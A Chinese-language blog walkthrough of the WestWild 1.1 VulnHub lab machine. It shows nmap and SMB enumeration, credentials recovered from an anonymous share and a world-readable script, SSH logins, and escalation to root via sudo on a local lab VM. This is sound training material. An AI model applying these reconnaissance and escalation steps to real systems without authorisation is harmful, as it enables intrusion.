一台简洁、标准而不失趣味的靶机。samba 信息泄露获得立足点，权限枚举获得敏感信息，实现横向移动，sudo 枚举获得 root 的权限。

WestWild 1.1

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.107
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:11 EDT
Nmap scan report for 192.168.56.107
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.56.107
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:11 EDT
Nmap scan report for 192.168.56.107
Host is up (0.00031s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 6f:ee:95:91:9c:62:b2:14:cd:63:0a:3e:f8:10:9e:da (DSA)
|   2048 10:45:94:fe:a7:2f:02:8a:9b:21:1a:31:c5:03:30:48 (RSA)
|   256 97:94:17:86:18:e2:8e:7a:73:8e:41:20:76:ba:51:73 (ECDSA)
|_  256 23:81:c7:76:bb:37:78:ee:3b:73:e2:55:ad:81:32:72 (ED25519)
80/tcp  open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesnot have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m03s, deviation: 1h43m55s, median: -3s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-05-25T07:12:06
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: westwild
|   NetBIOS computer name: WESTWILD\x00
|   Domain name: \x00
|   FQDN: westwild
|_  System time: 2023-05-25T10:12:06+03:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds


┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,139,445 192.168.56.107 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:12 EDT
Nmap scan report for 192.168.56.107
Host is up (0.00024s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

Nmap done: 1 IP address (1 host up) scanned in 320.92 seconds

smb 渗透

smb 脚本扫描一下

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.107 
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:14 EDT
Nmap scan report for 192.168.56.107
Host is up (0.000075s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.168.56.107\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (WestWild server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.56.107\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.168.56.107\wave: 
|     Type: STYPE_DISKTREE
|     Comment: WaveDoor
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\wavex\wave
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
| smb-enum-users: 
|   WESTWILD\aveng (RID: 1000)
|     Full name:   aveng
|     Description: 
|     Flags:       Normal user account
|   WESTWILD\root (RID: 1001)
|     Full name:   root
|     Description: 
|     Flags:       Normal user account
|   WESTWILD\wavex (RID: 1002)
|     Full name:   XxWavexX
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

尝试无密码登录，匿名登陆失败，wave 登陆成功

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.107/anonymous
Enter WORKGROUP\kali\'s password: 
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.107/wave     
Enter WORKGROUP\kali\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 30 01:18:56 2019
  ..                                  D        0  Thu Aug  1 19:02:20 2019
  FLAG1.txt                           N       93  Mon Jul 29 22:31:05 2019
  message_from_aveng.txt              N      115  Tue Jul 30 01:21:48 2019

1781464 blocks of size 1024. 285752 blocks available

把文件下载下来看看

┌──(kali㉿kali)-[~]
└─$ smbget smb://192.168.56.107/wave/FLAG1.txt
Password for [kali] connecting to //wave/192.168.56.107: 
Using workgroup WORKGROUP, user kali
smb://192.168.56.107/wave/FLAG1.txt                                                             
Downloaded 93b in 4 seconds

┌──(kali㉿kali)-[~]
└─$ cat FLAG1.txt 
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

┌──(kali㉿kali)-[~]
└─$ smbget smb://192.168.56.107/wave/message_from_aveng.txt
Password for [kali] connecting to //wave/192.168.56.107: 
Using workgroup WORKGROUP, user kali
smb://192.168.56.107/wave/message_from_aveng.txt                                 
Downloaded 115b in 1 seconds

┌──(kali㉿kali)-[~]
└─$ cat message_from_aveng.txt 
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset  it for me . 
Thank You 
Aveng

感觉是经过编码后的字符串，尝试一下 base64 解码。此外另一个文件得到了一个关键信息，或许这个用户有特殊的权限或者文件来帮助 aveng 来重置其密码

┌──(kali㉿kali)-[~]
└─$ echo -e "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K" | base64 -d
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

得到用户名和密码，ssh 登录试试

┌──(kali㉿kali)-[~]
└─$ ssh wavex@192.168.56.107                  
The authenticity of host '192.168.56.107 (192.168.56.107)' can\'t be established.
ED25519 key fingerprint is SHA256:oeuytnbnPest0/m/OtTQyjaFSRv03+EMhBmAX886bsk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.107' (ED25519) to the list of known hosts.
wavex@192.168.56.107\'s password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu May 25 10:10:12 +03 2023

  System load: 0.0               Memory usage: 3%   Processes:       92
  Usage of /:  77.9% of 1.70GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug  2 02:00:40 2019

提权

信息收集

ssh 登录成功，进行基础的信息收集

wavex@WestWild:~$ whoami
wavex
wavex@WestWild:~$ ls
wave
wavex@WestWild:~$ pwd
/home/wavex
wavex@WestWild:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:f6:8c:99 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.107/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fef6:8c99/64 scope link 
       valid_lft forever preferred_lft forever
wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 athlon i686 GNU/Linux
wavex@WestWild:~$ sudo -l
[sudo] password for wavex: 
Sorry, user wavex may not run sudo on WestWild.

查看一些关键文件

wavex@WestWild:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:111::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
aveng:x:1000:1000:aveng,,,:/home/aveng:/bin/bash
wavex:x:1001:1001:XxWavexX,,,:/home/wavex:/bin/bash
wavex@WestWild:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

.bashrc 文件也没什么收获，看看 s 权限文件

wavex@WestWild:~$ find / -type f -perm -04000 -ls 2>/dev/null
 63292   16 -rwsr-xr-x   1 root     root        13920 Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
  1610    8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
 57897  484 -rwsr-xr-x   1 root     root       492972 Mar  4  2019 /usr/lib/openssh/ssh-keysign
 51552  328 -rwsr-xr--   1 root     messagebus   333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  1403   32 -rwsr-xr-x   1 root     root        30984 May 17  2017 /usr/bin/newgrp
  1415   48 -rwsr-xr-x   1 root     root        45420 May 17  2017 /usr/bin/passwd
  1520  156 -rwsr-xr-x   1 root     root       156708 May 29  2017 /usr/bin/sudo
 57785   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
 57389   20 -rwsr-xr-x   1 root     root        18136 May  8  2014 /usr/bin/traceroute6.iputils
  1263   36 -rwsr-xr-x   1 root     root        35916 May 17  2017 /usr/bin/chsh
  1334   68 -rwsr-xr-x   1 root     root        66284 May 17  2017 /usr/bin/gpasswd
 63296   20 -rwsr-xr-x   1 root     root        18168 Jan 15  2019 /usr/bin/pkexec
  1260   44 -rwsr-xr-x   1 root     root        44620 May 17  2017 /usr/bin/chfn
 59129   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
 58179   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Nov 24  2016 /usr/sbin/uuidd
 58034  316 -rwsr-xr--   1 root     dip        323000 Jun 12  2018 /usr/sbin/pppd
    85   44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
 53426   32 -rwsr-xr-x   1 root     root        30112 May 15  2015 /bin/fusermount
    71   88 -rwsr-xr-x   1 root     root        88752 Nov 24  2016 /bin/mount
    84   40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
   112   68 -rwsr-xr-x   1 root     root        67704 Nov 24  2016 /bin/umount
   104   36 -rwsr-xr-x   1 root     root        35300 May 17  2017 /bin/su
 59488   36 -rwsr-xr-x   1 root     root        34568 Jun 28  2013 /sbin/mount.cifs
wavex@WestWild:~$ id
uid=1001(wavex) gid=1001(wavex) groups=1001(wavex)

定时任务呢?

wavex@WestWild:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

查看用户可写目录

依然没有收获。感觉根据另一个文件的提示，这个用户应该有一些特殊的文件和权限。

看一下这个用户可以写的目录有哪些

wavex@WestWild:/usr/share$ find / -writable -type d 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/1.session
/usr/share/av/westsidesecret
/home/wavex
/home/wavex/.cache
/home/wavex/wave
/var/lib/php5
/var/spool/samba
/var/crash
/var/tmp
/proc/1884/task/1884/fd
/proc/1884/fd
/proc/1884/map_files
/run/user/1001
/run/shm
/run/lock
/tmp

有个目录看起来有点意思，进去看看

wavex@WestWild:/usr/share$ cd /usr/share/av/westsidesecret
wavex@WestWild:/usr/share/av/westsidesecret$ 
wavex@WestWild:/usr/share/av/westsidesecret$ ls -liah
total 12K
69633 drwxrwxrwx 2 root  root  4.0K Jul 30  2019 .
69583 drwxr-xr-x 3 root  root  4.0K Jul 30  2019 ..
69685 -rwxrwxrwx 1 wavex wavex  101 Jul 30  2019 ififoregt.sh
wavex@WestWild:/usr/share/av/westsidesecret$ cat ififoregt.sh 
 #!/bin/bash 
 figlet "if i foregt so this my way"
 echo "user:aveng"
 echo "password:kaizen+80"

横向移动

得到了 aveng 的用户名和密码，ssh 登录

──(kali㉿kali)-[~]
└─$ ssh aveng@192.168.56.107
aveng@192.168.56.107\'s password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu May 25 10:19:42 +03 2023

  System load:  0.0               Processes:           106
  Usage of /:   77.9% of 1.70GB   Users logged in:     0
  Memory usage: 10%               IP address for eth0: 192.168.56.107
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Wed Jul 31 19:26:18 2019 from 192.168.59.1
aveng@WestWild:~$ id
uid=1000(aveng) gid=1000(aveng) groups=1000(aveng),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),114(lpadmin)
aveng@WestWild:~$ whoami
aveng
aveng@WestWild:~$ sudo -l
[sudo] password for aveng: 
Matching Defaults entries for aveng on WestWild:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aveng may run the following commands on WestWild:
    (ALL : ALL) ALL

用户的 sudo -l 显示此用户有全部权限，那就切换用户吧

aveng@WestWild:~$ su -
Password: 
su: Authentication failure
aveng@WestWild:~$ sudo su
root@WestWild:/home/aveng# id
uid=0(root) gid=0(root) groups=0(root)
root@WestWild:/home/aveng# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:f6:8c:99 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.107/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fef6:8c99/64 scope link 
       valid_lft forever preferred_lft forever
root@WestWild:/home/aveng# whoami
root
root@WestWild:/home/aveng# sudo -l
Matching Defaults entries for root on WestWild:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on WestWild:
    (ALL : ALL) ALL

提权成功

root@WestWild:/home/aveng# cd /root
root@WestWild:~# ls -liah
total 36K
 7689 drwx------  3 root root 4.0K Aug  2  2019 .
    2 drwxr-xr-x 21 root root 4.0K Jul 30  2019 ..
 1097 -rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
69681 drwx------  2 root root 4.0K Jul 31  2019 .cache
69869 -rw-r--r--  1 root root  122 Jul 31  2019 FLAG2.txt
 1098 -rw-r--r--  1 root root  140 Feb 20  2014 .profile
69835 -rw-r--r--  1 root root   75 Jul 31  2019 .selected_editor
69677 -rw-------  1 root root 4.9K Jul 31  2019 .viminfo
root@WestWild:~# cat FLAG2.txt 
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}

Great! take a screenshot and Share it with me in twitter @HashimAlshareff

knowledge_database > vulnhub

WestWild 1.1 靶机

https://i3eg1nner.github.io/2023/05/413cb738f5c5.html

作者

I3eg1nner

发布于

2023年5月25日

许可协议

web运行基础环境搭建与加固上一篇

Hello World 下一篇